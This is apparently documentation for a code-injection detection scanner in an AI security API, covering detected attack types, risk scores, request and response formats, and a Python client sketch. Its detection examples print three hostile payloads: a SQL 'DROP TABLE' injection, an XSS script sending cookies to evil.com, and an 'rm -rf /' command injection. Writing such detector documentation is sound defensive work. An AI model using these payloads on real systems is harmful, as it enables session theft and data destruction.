
Code Injection

Identifies SQL injection, XSS, and command injection

API Field: code_injection_enabled

Overview

Code Injection Detection identifies malicious code patterns that could exploit vulnerabilities in your application. This includes SQL injection, Cross-Site Scripting (XSS), command injection, and other code-based attacks that might be passed through AI interactions.

What It Detects

  • SQL injection attempts
  • Cross-Site Scripting (XSS) payloads
  • Command injection (shell commands)
  • LDAP injection
  • XML/XXE injection
  • Path traversal attacks
  • Template injection
  • Code execution attempts

Why It Matters

Code injection attacks can lead to complete system compromise, data theft, service disruption, and ransomware deployment. These attacks exploit the trust boundary between AI-generated content and backend systems.

Technical Details

Risk Score Range

0.0 - 1.0 (High risk: > 0.6)

Confidence Level

Typically 0.88 - 0.98

Processing Time

< 60ms per scan

Common Use Cases

  • AI-powered search interfaces
  • Natural language to SQL converters
  • Code generation tools
  • Automated testing assistants
  • Database query builders

Detection Examples

Threat Example #1 (Risk: 97%)
'; DROP TABLE users; --

Classic SQL injection attempting to delete a database table.

Threat Example #2 (Risk: 95%)
<script>document.location='http://evil.com/steal?'+document.cookie</script>

XSS payload attempting to steal session cookies.

Threat Example #3 (Risk: 99%)
| rm -rf / --no-preserve-root

Command injection attempting to delete all files on the system.

API Usage

Enable this scanner in your API request by setting code_injection_enabled to true in your API key settings, or include it in your request:

curl -X POST https://benguard.io/api/v1/scan \
  -H "X-API-Key: ben_your_api_key_here" \
  -H "Content-Type: application/json" \
  -d '{
    "prompt": "Your user input here"
  }'

The scanner settings are configured per API key in your dashboard under Settings → Scanner Configuration.

Response Format

When this scanner detects a threat, the response will include:

{
  "is_valid": false,
  "status": "threat_detected",
  "risk_score": 0.97,
  "threat_types": ["code_injection"],
  "details": {
    "results": [
      {
        "scanner": "code_injection",
        "threat_detected": true,
        "risk_score": 0.97,
        "confidence": 0.92,
        "details": {
          "reason": "Classic SQL injection attempting to delete database table.",
          "evidence": ["detected pattern in input"]
        }
      }
    ]
  },
  "request_id": "req_abc123"
}
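As an added example (not BenGuard's own client code), the Python below builds the request shown in the curl example and applies the documented high-risk threshold (> 0.6) to a response in the format above, failing closed on malformed JSON; the embedded sample response is the Threat Example #1 response from this page, reproduced as constructed test data. The request is built but not sent, so the code runs offline.

```python
import json
from dataclasses import dataclass

SCAN_URL = "https://benguard.io/api/v1/scan"  # endpoint from the page's curl example
HIGH_RISK_THRESHOLD = 0.6  # documented: risk_score above 0.6 is high risk

def build_scan_request(api_key: str, prompt: str) -> tuple:
    """Headers and JSON body for POST SCAN_URL, mirroring the page's curl example."""
    headers = {"X-API-Key": api_key, "Content-Type": "application/json"}
    body = json.dumps({"prompt": prompt}).encode("utf-8")
    return headers, body

@dataclass
class ScanVerdict:
    allow: bool          # may the prompt be forwarded to the backend?
    risk_score: float    # highest code_injection risk seen (or top-level score)
    threat_types: list
    reasons: list        # human-readable reasons from flagged results
    request_id: str

def evaluate_scan_response(raw: str, threshold: float = HIGH_RISK_THRESHOLD) -> ScanVerdict:
    """Block when is_valid is false or any code_injection result exceeds the threshold."""
    try:
        data = json.loads(raw)
    except json.JSONDecodeError:
        # Unparseable response: treat as a block rather than letting input through.
        return ScanVerdict(False, 1.0, ["unparseable_response"], ["invalid JSON"], "")
    results = data.get("details", {}).get("results", [])
    flagged = [r for r in results if r.get("scanner") == "code_injection"]
    reasons = [(r.get("details") or {}).get("reason", "")
               for r in flagged if r.get("threat_detected")]
    top = max((float(r.get("risk_score", 0.0)) for r in flagged),
              default=float(data.get("risk_score", 0.0)))
    allow = bool(data.get("is_valid", False)) and top <= threshold
    return ScanVerdict(allow, top, list(data.get("threat_types", [])), reasons,
                       str(data.get("request_id", "")))

# Constructed sample: the Threat Example #1 response shown on this page.
SAMPLE_RESPONSE = json.dumps({
    "is_valid": False, "status": "threat_detected", "risk_score": 0.97,
    "threat_types": ["code_injection"], "request_id": "req_abc123",
    "details": {"results": [{
        "scanner": "code_injection", "threat_detected": True, "risk_score": 0.97,
        "confidence": 0.92,
        "details": {"reason": "Classic SQL injection attempting to delete database table.",
                    "evidence": ["detected pattern in input"]}}]},
})
```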

Best Practices

  • Never execute AI-generated code without sandboxing
  • Use parameterized queries, not string concatenation
  • Implement content security policies
  • Validate all outputs before rendering
  • Use allowlists for permitted operations

Related Scanners

Consider enabling these related scanners for comprehensive protection: